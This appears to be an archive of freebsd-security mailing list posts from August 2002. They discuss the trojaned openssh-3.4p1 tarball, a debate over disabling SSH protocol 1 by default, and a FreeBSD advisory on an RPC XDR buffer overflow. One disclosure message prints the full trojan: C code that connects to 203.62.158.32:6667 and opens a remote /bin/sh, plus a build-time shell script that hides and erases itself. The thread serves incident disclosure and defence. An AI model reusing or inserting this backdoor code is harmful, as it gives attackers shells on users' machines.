04:19:55 -0700 (PDT) Received: from earth.hal.rcast.u-tokyo.ac.jp (earth.hal.rcast.u-tokyo.ac.jp [157.82.80.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 3101643E70 for ; Thu, 1 Aug 2002 04:19:54 -0700 (PDT) (envelope-from konno@hal.rcast.u-tokyo.ac.jp) Received: from [192.168.80.236] (sun [157.82.80.16]) by earth.hal.rcast.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id UAA07043; Thu, 1 Aug 2002 20:19:53 +0900 (JST) Date: Thu, 01 Aug 2002 20:19:52 +0900 From: Shunichi Konno To: freebsd-security@FreeBSD.ORG Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: References: Message-Id: <20020801201132.98EF.KONNO@hal.rcast.u-tokyo.ac.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.05.03 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello. Thank you for your comment, but there was no such a problem. :) I checked it trojaned or not after I extracted openssh-3.4.tgz. And I know too, that "bf-test.out" which is the shell script made by bf-test.c, will change Makefile and Makefile.in, and remove bftest* like this: grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out rm -f bf-test* On Thu, 01 Aug 2002 12:55:46 +0200 Christoph Wegener wrote: CW> but be careful: you have to check it with the original tgz-file, cause the shellscript removes its existence itself from the archive once you CW> have installed. So taking your tree and making a tgz is NO solution to test... ---------- KONNO Shunichi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 4:35: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 724DF37B400 for ; Thu, 1 Aug 2002 04:35:01 -0700 (PDT) Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id 71C1743E4A for ; Thu, 1 Aug 2002 04:35:00 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id NAA00576; Thu, 1 Aug 2002 13:34:52 +0200 From: Christoph Wegener To: Mario Pranjic Cc: Shunichi Konno , Mario Pranjic , freebsd-security@FreeBSD.ORG Date: Thu, 01 Aug 2002 13:34:51 +0200 X-Priority: 3 (Normal) Organization: Lehrstuhl fuer Biophysik - Ruhr-Universitaet Bochum In-Reply-To: Message-Id: <1TZW96USXWA5PMB982KGRN1VVT72RNOL.3d491cdb@gonzo> Subject: Re: openssh-3.4p1.tar.gz trojaned MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" X-Mailer: Opera 6.04 build 1135 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, well as I mentioned in one of my earlier mails, the tarball on the openbsd repositories are exchanged and infected with a trojan. So it is clear that the version you just downloaded is infected... Christoph 1.8.2002 13:07:51, Mario Pranjic wrote: >On Thu, 1 Aug 2002, Christoph Wegener wrote: > >> Date: Thu, 01 Aug 2002 12:55:46 +0200 >> From: Christoph Wegener >> To: Shunichi Konno , >> Mario Pranjic >> Cc: freebsd-security@FreeBSD.ORG >> Subject: Re: openssh-3.4p1.tar.gz trojaned >> >> Hi, >> but be careful: you have to check it with the original tgz-file, cause the shellscript removes its existence itself from the archive once you >> have installed. So taking your tree and making a tgz is NO solution to test... > >tar tzf openssh-3.4.tgz | less > >In my distfiles, I find no sign of bf-test.c. > >When i did: >make fetch; make checksum in openssh ports dir I got the checksum >mismatch and I found the bf-test.c: >ssh/ssh-keygen/bf-test.c > >My old md5 (from which openssh ports is compiled: >MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2 > >New (just downloaded) openssh source: >MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a > >This one DOES contain bf-test.c file. > >Any ideas what is going on? > > >Mario Pranjic, dipl.ing. >sistem administrator >Knjiznica, Institut Rudjer Boskovic >------------------------------------- >e-mail: mario.pranjic@irb.hr >ICQ: 72059629 >tel: +385 1 45 60 954 (interni: 1293) >------------------------------------- > > > > -- .-. Ruhr-Universitaet Bochum /v\ L I N U X Lehrstuhl fuer Biophysik // \\ >Penguin Computing< c/o Christoph Wegener /( )\ Gebaeude ND 04/Nord ^^-^^ D-44780 Bochum, GERMANY Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 4:44:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8224937B400 for ; Thu, 1 Aug 2002 04:44:50 -0700 (PDT) Received: from nippur.irb.hr (nippur.irb.hr [161.53.128.127]) by mx1.FreeBSD.org (Postfix) with ESMTP id B5E2C43E81 for ; Thu, 1 Aug 2002 04:44:48 -0700 (PDT) (envelope-from mario.pranjic@irb.hr) Received: from localhost (keeper@localhost) by nippur.irb.hr (8.9.3/8.9.3) with ESMTP id NAA26608; Thu, 1 Aug 2002 13:40:56 +0200 (MET DST) Date: Thu, 1 Aug 2002 13:40:56 +0200 (MET DST) From: Mario Pranjic To: Christoph Wegener Cc: Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: <1TZW96USXWA5PMB982KGRN1VVT72RNOL.3d491cdb@gonzo> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002, Christoph Wegener wrote: > Date: Thu, 01 Aug 2002 13:34:51 +0200 > From: Christoph Wegener > To: Mario Pranjic > Cc: Shunichi Konno , > Mario Pranjic , freebsd-security@FreeBSD.ORG > Subject: Re: openssh-3.4p1.tar.gz trojaned > > Hi, > well as I mentioned in one of my earlier mails, the tarball on the openbsd repositories are exchanged and infected with a trojan. So it is clear > that the version you just downloaded is infected... Of course. I understand that. But, I wanted your opinion about the openssh that installed yesterday (or the day before, not so sure right now). It has the right md5 checksum and no trojan file in tarball. If I got it right, openssh source tarball has changed in past 24 hourhs on ftp.openbsd.org and that one is infected. If so, I installed the clean version before the one with trojan was put on ftp server. We'll see what will the maintainer say about it (dinoex@FreeBSD.org). Mario Pranjic, dipl.ing. sistem administrator Knjiznica, Institut Rudjer Boskovic ------------------------------------- e-mail: mario.pranjic@irb.hr ICQ: 72059629 tel: +385 1 45 60 954 (interni: 1293) ------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5: 6:54 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E289337B400; Thu, 1 Aug 2002 05:06:49 -0700 (PDT) Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by mx1.FreeBSD.org (Postfix) with ESMTP id B0A2043E7B; Thu, 1 Aug 2002 05:06:48 -0700 (PDT) (envelope-from trevor@jpj.net) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g71C6got024802; Thu, 1 Aug 2002 08:06:42 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g71C6fL6024799; Thu, 1 Aug 2002 08:06:42 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Thu, 1 Aug 2002 08:06:41 -0400 (EDT) From: Trevor Johnson To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] In-Reply-To: Message-ID: <20020705170032.V94044-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav wrote: > Trevor Johnson writes: > > Use of protocol version 1 makes an insertion attack possible, according to > > . > > That same page also explains that OpenSSH contains code to make such > attacks very difficult. Their actual wording is "difficult but possible," not "very difficult." The CRC32 compensation detection code to which you allude used to have remote root hole, which was published and widely exploited. In response, CERT recommended in December of 2001 that protocol version 1 be disabled: Because the vulnerability affects software handling the SSHv1 protocol, sites may wish to enable SSHv2 support only and disable SSHv1 fallback support. Refer to your secure shell server software documentation for information about how to accomplish this. Disabling SSHv1 support is generally a good practice, since a number of other vulnerabilities exist in the SSHv1 protocol itself and software handling of this protocol. That is from . > > The vulnerability was > > published by CORE SDI in June of 1998. I would like to see protocol > > version 1 disabled by default, with a note in UPDATING about the change. > > No. I will not arbitrarily lock users out of their machines. Many users already must read UPDATING to get a working installation of OpenSSH. The OpenBSD folks have a philosophy that users who don't understand their systems and don't spend much time configuring them systems shouldn't become easy marks for attackers because of the installation defaults. They explain it better than I, at . Removing a weakness in security is not an arbitrary change. It is the type of change that is suitable for FreeBSD -STABLE in spite of inconvenience to users, and making one-line changes to two files is only a mild inconvenience. Please reconsider. -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:12:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6761737B400 for ; Thu, 1 Aug 2002 05:12:22 -0700 (PDT) Received: from mail.comitnet.com (skiffer.comitnet.com [212.181.63.123]) by mx1.FreeBSD.org (Postfix) with SMTP id D128A43E4A for ; Thu, 1 Aug 2002 05:12:20 -0700 (PDT) (envelope-from bond@comitnet.se) Received: (qmail 18969 invoked from network); 1 Aug 2002 12:12:21 -0000 Received: from unknown (HELO ?192.168.57.109?) (212.181.63.111) by 212.181.63.98 with SMTP; 1 Aug 2002 12:12:21 -0000 Mime-Version: 1.0 X-Sender: bond%comitnet.se@pop3.comitnet.com Message-Id: Date: Thu, 1 Aug 2002 14:11:24 +0200 To: freebsd-security@FreeBSD.ORG From: Artur Lindgren Subject: Trojan located in latest openssh tar files Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Greetings, I noticed that openssh-3.4p has a trojan horse (available from ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz and some of the mirrors. (ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/ ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/ ) After compiling the file bf-test.c you will notice that it does following: # testing in raw ecb mode #!/bin/sh cat >conftest.c <<_ACEOF #include #include #include #include #include #include #include #include jmp_buf env;int s;char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";void sig (int sig){close(s);sleep(3600);longjmp(env,0); }int main(){int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;switch(fork()){case 0:break;default:exit(0);}close(0);close(1);close(2); memset(&act,0,sizeof(act));act.sa_handler=sig; sigaction(SIGALRM,&act,NULL);do{setjmp(env); if((s=socket(AF_INET,SOCK_STREAM,0))==(1))exit(1); memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET; sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr ("203.62.158.32");alarm(10);if(connect(s, (struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1) ;if((x=read(s,&c,1))==(-1)){exit(1);} else if(x==1){switch(c){case 'A':exit(0);case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2) ;a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break; case 'M':alarm(0);sig(0);break;default:}}else{exit (0);}}while(1);} _ACEOF (grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out rm -f bf-test* TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`" if ! test $TESTPROG ; then TESTPROG=sh; fi gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1 It runs once, upon compilation of openssh, and is named sh or the compiling users default shell in the processlist in the process listing. This trojan attempts to connect to 203.62.158.32:6667 (hacked machine which has been secured now), and awaits one of three characters as the command; D execs /bin/sh M respawns A kills the deamon The /bin/sh executed via the D command was controlled by the daemon listening on 203.62.158.32:6667, potentially meaning that people affected by this has given a shell, possibly root, to user unknown. "Let this be a lesson. Don't use root unless you REALLY have to." Regards, Artur Lindgren, Comitnet AB Special thanks to (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP people in sweden :D) Thanks to ^Sarge^ for quickly taking care of the hacked machine this trojan connected to. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:13:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2E91B37B400; Thu, 1 Aug 2002 05:13:29 -0700 (PDT) Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8314B43E6A; Thu, 1 Aug 2002 05:13:28 -0700 (PDT) (envelope-from des@ofug.org) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 620EE535F; Thu, 1 Aug 2002 14:13:23 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Trevor Johnson Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] References: <20020705170032.V94044-100000@blues.jpj.net> From: Dag-Erling Smorgrav Date: 01 Aug 2002 14:13:22 +0200 In-Reply-To: <20020705170032.V94044-100000@blues.jpj.net> Message-ID: Lines: 11 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Trevor Johnson writes: > Removing a weakness in security is not an arbitrary change. It is the > type of change that is suitable for FreeBSD -STABLE in spite of > inconvenience to users, and making one-line changes to two files is only a > mild inconvenience. So make that change on your own systems. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:23:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id EE91B37B481 for ; Thu, 1 Aug 2002 05:23:21 -0700 (PDT) Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id 86E1043E42 for ; Thu, 1 Aug 2002 05:23:20 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id OAA01977; Thu, 1 Aug 2002 14:23:15 +0200 From: Christoph Wegener To: Mario Pranjic Cc: freebsd-security@FreeBSD.ORG Date: Thu, 01 Aug 2002 14:23:14 +0200 X-Priority: 3 (Normal) Organization: Lehrstuhl fuer Biophysik - Ruhr-Universitaet Bochum In-Reply-To: Message-Id: Subject: Re: openssh-3.4p1.tar.gz trojaned MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" X-Mailer: Opera 6.04 build 1135 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi again, yes you are right: I agree that the version on the ftp-server must have been changed during the last 24 hours - so you _might_ be safe... But who can guaranty that... :(( AFAIK: if you don not have the trojan in the origin tarball this is a good indicator for being safe... Just my 2 cents...cheers Christoph 1.8.2002 13:40:56, Mario Pranjic wrote: >Of course. I understand that. > >But, I wanted your opinion about the openssh that installed yesterday (or >the day before, not so sure right now). > >It has the right md5 checksum and no trojan file in tarball. > >If I got it right, openssh source tarball has changed in past 24 hourhs on >ftp.openbsd.org and that one is infected. > >If so, I installed the clean version before the one with trojan was put on >ftp server. > >We'll see what will the maintainer say about it (dinoex@FreeBSD.org). -- .-. Ruhr-Universitaet Bochum /v\ L I N U X Lehrstuhl fuer Biophysik // \\ >Penguin Computing< c/o Christoph Wegener /( )\ Gebaeude ND 04/Nord ^^-^^ D-44780 Bochum, GERMANY Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:28: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5CC6237B400; Thu, 1 Aug 2002 05:28:00 -0700 (PDT) Received: from blues.jpj.net (blues.jpj.net [208.210.80.156]) by mx1.FreeBSD.org (Postfix) with ESMTP id A15F143E72; Thu, 1 Aug 2002 05:27:59 -0700 (PDT) (envelope-from trevor@jpj.net) Received: from blues.jpj.net (localhost.jpj.net [127.0.0.1]) by blues.jpj.net (8.12.3/8.12.3) with ESMTP id g71CRwot025652; Thu, 1 Aug 2002 08:27:58 -0400 (EDT) (envelope-from trevor@jpj.net) Received: from localhost (trevor@localhost) by blues.jpj.net (8.12.3/8.12.3/Submit) with ESMTP id g71CRws9025649; Thu, 1 Aug 2002 08:27:58 -0400 (EDT) X-Authentication-Warning: blues.jpj.net: trevor owned process doing -bs Date: Thu, 1 Aug 2002 08:27:58 -0400 (EDT) From: Trevor Johnson To: Dag-Erling Smorgrav Cc: Mike Tancsa , Ruslan Ermilov , Subject: Re: Default ssh protocol in -STABLE [was: HEADS UP: FreeBSD-STABLE now has OpenSSH 3.4p1] In-Reply-To: Message-ID: <20020801081645.T19455-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dag-Erling Smorgrav wrote: > Trevor Johnson writes: > > Removing a weakness in security is not an arbitrary change. It is the > > type of change that is suitable for FreeBSD -STABLE in spite of > > inconvenience to users, and making one-line changes to two files is only a > > mild inconvenience. > > So make that change on your own systems. This is the section of http://www.openbsd.org/security.html#default which I had hoped you would read: To ensure that novice users of OpenBSD do not need to become security experts overnight (a viewpoint which other vendors seem to have), we ship the operating system in a Secure by Default mode. All non-essential services are disabled. As the user/administrator becomes more familiar with the system, he will discover that he has to enable daemons and other parts of the system. During the process of learning how to enable a new service, the novice is more likely to learn of security considerations. This is in stark contrast to the increasing number of systems that ship with NFS, mountd, web servers, and various other services enabled by default, creating instantaneous security problems for their users within minutes after their first install. In enabling protocol version 1 by default, you have created a security problem for new users of FreeBSD. If they become aware of the problem, they can reconfigure their systems as you advise me to do. It is better for users to choose to diminish their security when they need a service. -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:34: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 2DAA037B400 for ; Thu, 1 Aug 2002 05:33:57 -0700 (PDT) Received: from addr-mx01.addr.com (addr-mx01.addr.com [209.249.147.145]) by mx1.FreeBSD.org (Postfix) with ESMTP id CE74043E70 for ; Thu, 1 Aug 2002 05:33:56 -0700 (PDT) (envelope-from torvalds@addr.com) Received: from proxy1.addr.com (proxy1.addr.com [209.249.147.28]) by addr-mx01.addr.com (8.12.2/8.12.2) with ESMTP id g71CXDmQ034888; Thu, 1 Aug 2002 05:33:14 -0700 (PDT) Received: from TS22 ([202.71.153.170]) by proxy1.addr.com (8.11.6/8.9.1) with ESMTP id g71CXB244368; Thu, 1 Aug 2002 05:33:12 -0700 (PDT) (envelope-from torvalds@addr.com)(envelope-to ) Message-ID: <016301c23957$7d8436f0$9600a8c0@blraddrcom> From: "Naga Suresh B" To: "Christoph Wegener" Cc: References: Subject: Re: openssh-3.4p1.tar.gz trojaned Date: Thu, 1 Aug 2002 18:02:22 +0530 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Scanned-By: MIMEDefang 2.15 (www dot roaringpenguin dot com slash mimedefang) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org how we can findout that trojaned attacked our server or not. ----- Original Message ----- From: "Christoph Wegener" To: "Mario Pranjic" Cc: Sent: Thursday, August 01, 2002 5:53 PM Subject: Re: openssh-3.4p1.tar.gz trojaned > Hi again, > yes you are right: I agree that the version on the ftp-server must have been changed during the last 24 hours - so you _might_ be safe... > But who can guaranty that... :(( AFAIK: if you don not have the trojan in the origin tarball this is a good indicator for being safe... > > Just my 2 cents...cheers > Christoph > > 1.8.2002 13:40:56, Mario Pranjic wrote: > > >Of course. I understand that. > > > >But, I wanted your opinion about the openssh that installed yesterday (or > >the day before, not so sure right now). > > > >It has the right md5 checksum and no trojan file in tarball. > > > >If I got it right, openssh source tarball has changed in past 24 hourhs on > >ftp.openbsd.org and that one is infected. > > > >If so, I installed the clean version before the one with trojan was put on > >ftp server. > > > >We'll see what will the maintainer say about it (dinoex@FreeBSD.org). > -- > .-. Ruhr-Universitaet Bochum > /v\ L I N U X Lehrstuhl fuer Biophysik > // \\ >Penguin Computing< c/o Christoph Wegener > /( )\ Gebaeude ND 04/Nord > ^^-^^ D-44780 Bochum, GERMANY > > Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 > mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 5:34:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DC32C37B400; Thu, 1 Aug 2002 05:34:27 -0700 (PDT) Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by mx1.FreeBSD.org (Postfix) with ESMTP id 201AE43E77; Thu, 1 Aug 2002 05:34:25 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: from freefall.freebsd.org (nectar@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g71CYOJU000907; Thu, 1 Aug 2002 05:34:24 -0700 (PDT) (envelope-from security-advisories@freebsd.org) Received: (from nectar@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g71CYODU000905; Thu, 1 Aug 2002 05:34:24 -0700 (PDT) Date: Thu, 1 Aug 2002 05:34:24 -0700 (PDT) Message-Id: <200208011234.g71CYODU000905@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: nectar set sender to security-advisories@freebsd.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-02:34.rpc [REVISED] Reply-To: security-advisories@freebsd.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-02:34.rpc Security Advisory The FreeBSD Project Topic: Sun RPC XDR decoder contains buffer overflow Category: core Module: libc Announced: 2002-08-01 Credits: ISS X-Force Affects: All releases of FreeBSD up to and including 4.6.1-RELEASE-p5 Corrected: 2002-08-01 12:23:20 UTC (RELENG_4) 2002-08-01 12:23:40 UTC (RELENG_4_6) 2002-08-01 12:23:58 UTC (RELENG_4_5) 2002-08-01 12:24:20 UTC (RELENG_4_4) FreeBSD only: NO 0. Revision History v1.0 2002-07-31 Initial release v1.1 2002-08-01 Corrected patch I. Background Sun RPC is a remote procedure call framework which allows clients to invoke procedures in a server process over a network somewhat transparently. XDR is a mechanism for encoding data structures for use with RPC. NFS, NIS, and many other network services are built upon Sun RPC. The FreeBSD C runtime library (libc) contains an XDR encoder/decoder derived from Sun's RPC implementation. II. Problem Description An error in the calculation of memory needed for unpacking arrays in the XDR decoder can result in a heap buffer overflow. III. Impact Any application using Sun RPC may be vulnerable to the heap buffer overflow. Depending upon the application, this vulnerability may be exploitable and lead to arbitrary code execution. Though no exploits are known to exist currently, many RPC-based services run as the superuser (such as NFS, the NIS server, rpc.statd, and others) and thus this vulnerability should be considered high-risk. No RPC-based services are enabled by default in FreeBSD installations. IV. Workaround Do not run any RPC-based services. The RPC-based services running on a machine may be determined by: # rpcinfo -p To disable any RPC-based services at next boot, add (or change if it is already present) the following lines in /etc/rc.conf: portmap_enable="NO" nfs_client_enable="NO" nfs_server_enable="NO" nis_client_enable="NO" nis_server_enable="NO" V. Solution Do one of the following: 1) Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6, RELENG_4_5, or RELENG_4_4 security branch dated after the correction date (4.6.1-RELEASE-p6, 4.5-RELEASE-p15, or 4.4-RELEASE-p22). 2) To patch your present system: The following patch has been verified to apply to FreeBSD 4.4, 4.5, and 4.6 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:34/rpc.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system as described in . Note that any statically linked applications that are not part of the base system (i.e. from the Ports Collection or other 3rd-party sources) must be recompiled if they use Sun RPC. All affected applications must be restarted in order to use the corrected library. Though it is not required, rebooting may be the easiest way to accomplish this. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Path Revision Branch - ------------------------------------------------------------------------- src/lib/libc/xdr/xdr_array.c RELENG_4 1.8.2.3 RELENG_4_6 1.8.10.4 RELENG_4_5 1.8.8.3 RELENG_4_4 1.8.6.3 src/sys/conf/newvers.sh RELENG_4_6 1.44.2.23.2.11 RELENG_4_5 1.44.2.20.2.16 RELENG_4_4 1.44.2.17.2.21 - ------------------------------------------------------------------------- VII. References -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iQCVAwUBPUkpkFUuHi5z0oilAQF7TQP9H50V3qUsZcWC5nemnMO9CL+QBmIuuGkE C7p3mBxcH6mS5EmUU4zFOum4QSaEh9J47I7CGcS+sNg7JN5lfK1oSwsE9JidbZz4 kx9cQrx+rppQuQyK9tK4TXVXz0PiUdZMs3vgytJDuAOu38bg3ttUd4jhTIKHnLGh NMjQMH2vNUk= =yP62 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with 